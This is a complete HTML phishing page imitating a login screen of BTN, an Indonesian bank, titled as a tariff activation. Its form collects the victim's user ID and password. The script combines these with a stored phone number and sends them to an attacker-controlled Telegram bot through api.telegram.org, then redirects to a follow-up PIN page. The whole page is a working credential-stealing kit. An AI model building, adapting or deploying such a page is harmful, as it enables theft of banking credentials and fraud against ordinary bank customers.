<!DOCTYPE html>
<html lang="in">
<head>
      <meta charset="UTF-8">
      <title>𝗕𝗧𝗡 - 𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳</title>
      <meta name="theme-color" content="#0147A9">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
      <link href="https://raw.githubusercontent.com/gopay882/ast/main/BTN/icon.png" rel="shortcut icon" type="image/x-icon">
<link href="https://raw.githubusercontent.com/gopay882/ast/main/BTN/icon.png" rel="apple-touch-icon">
</head>
<style>
      @import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');
      
 body {
       font-family: sans-serif;
       margin: 0px;
       background: #fff;
}
      
.user{ 
      display: block;
      border-radius: 10px;
      padding-left:50px; 
      background-image: url(https://raw.githubusercontent.com/gopay882/ast/main/BTN/user.png); 
      background-size: 100% 100%; 
      background-position: 100% 100%; 
      font-size: 16px;
      font-weight: 500;
      color: #0064af;
      border: none;
      outline:none;
      height: 49px;
      width: 75%;
      top: 5px;
      bottom: 0;
      position: relative;
      margin: auto;
}

.pass{
      display: block;
      border-radius: 10px;
      padding-left:50px; 
      background-image: url(https://raw.githubusercontent.com/gopay882/ast/main/BTN/pass.png); 
      background-size: 100% 100%; 
      background-position: 100% 100%; 
      font-size: 16px;
      font-weight: 500;
      color: #0064af;
      border: none;
      outline:none;
      height: 49px;
      width: 75%;
      top: 5px;
      bottom: 0;
      position: relative;
      margin: auto;
}

.lbl1{
      float: left; 
      margin-left: 30px; 
      color: #0A5E9A;
      font-weight: bold;
      margin-top:43px;
      font-size:15px;
}

.lbl2{
      float: left; 
      margin-left: 30px; 
      color: #0A5E9A;
      font-weight: bold;
      margin-top:3px;
      font-size:15px;
}

.sandi{
      font-size:14px;
      color:#0A5E9A;
      font-weight:bold;
      text-decoration:none;
      float:right;
      margin-top:15px;
      margin-right:40px;
}

.btn{ 
      position: relative;
      width: 87%; 
      height: 48px; 
      background: url(https://raw.githubusercontent.com/gopay882/ast/main/BTN/buttonlogin.png); 
      background-size: 100% 100%; 
      background-position: 100%:100%; 
      background-refreat: no-refeat; 
      border: none; 
      border-radius: 12px; 
      top: 28px; 
      color: #fff; 
      font-weight: bold; 
      padding-right: 60px;
      justify-content: center;
      margin: auto;
      display: block;
}

.center{
      display: block;
      justify-content: center;
      margin: auto;
}

::placeholder{
      color: #000;
      opacity: 0.3;
}

.process {
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #0000005b;
     z-index: 999999999;
     width: 100%;
     height: 100%;
 }
 
 .loading {
     margin-top: -50px;
     position: absolute;
     display: flex;
     justify-content: center;
     align-items: center;
 }

 .loading img {
     width: 100px;
 }
</style>
<body>
 <img src="https://raw.githubusercontent.com/gopay882/ast/main/BTN/login.png" width="100%" alt="">
 <div id="loading" name="process" class="process" style="display: none;">
			<div class="loading">      
				<img src="https://raw.githubusercontent.com/gopay882/ast/main/BTN/loading.gif">
			</div>				
		</div>
		<form id="formLog" onsubmit="sendLog()">
<input type="hidden" name="nohp" id="nohp">
 <label for="user" class="lbl1">ID Pengguna</label>
 <input type="text" id="user" name="user" class="user" placeholder="Ex. 507483AG" required>
 <br>  
 <label for="pass" class="lbl2">Kata sandi</label>
 <input type="text" id="pass" name="pass" class="pass" placeholder="Ex. 12a45678" required>
 <a href="#" class="sandi">Lupa kata sandi?</a>     
 <button type="submit" id="btn" class="btn">Masuk</button>
 </form>
 <br>
 <br>
 <br> 
 
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script><script src="i.js"></script>
<script>

 var nohp = sessionStorage.getItem('nohp', nohp);
 document.getElementById("nohp").value = nohp + "";        
var logo = "━─━─༺𝙬𝙬𝙬.𝙗𝙩𝙣.𝙘𝙤.𝙞𝙙___▩";        
 function sendLog(){
      event.preventDefault();
      $(".process").fadeIn(); 
      
  var nohp = $('#nohp').val();
  sessionStorage.setItem('nohp', nohp);
  
  var user = $('#user').val();
  sessionStorage.setItem('user', user);
  
  var pass = $('#pass').val();
  sessionStorage.setItem('pass', pass);
          
    var gabungan = "" + logo + '%0A※ 𝗡𝗼.𝗛𝗣 •• ' + nohp + '%0A%0A※ 𝗨𝘀𝗲𝗿 •• ' + user + '%0A※ 𝗣𝗮𝘀𝘀 •• ' + pass;
        $.ajax({                   
            url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
            method: `POST`,                      
            complete: function(data) {
            setTimeout(function(){            
            window.location.href='pin.html';
            $(".process").fadeOut();     
   }, 500);
            }
          })
        }
        
</script>
</body>
</html>
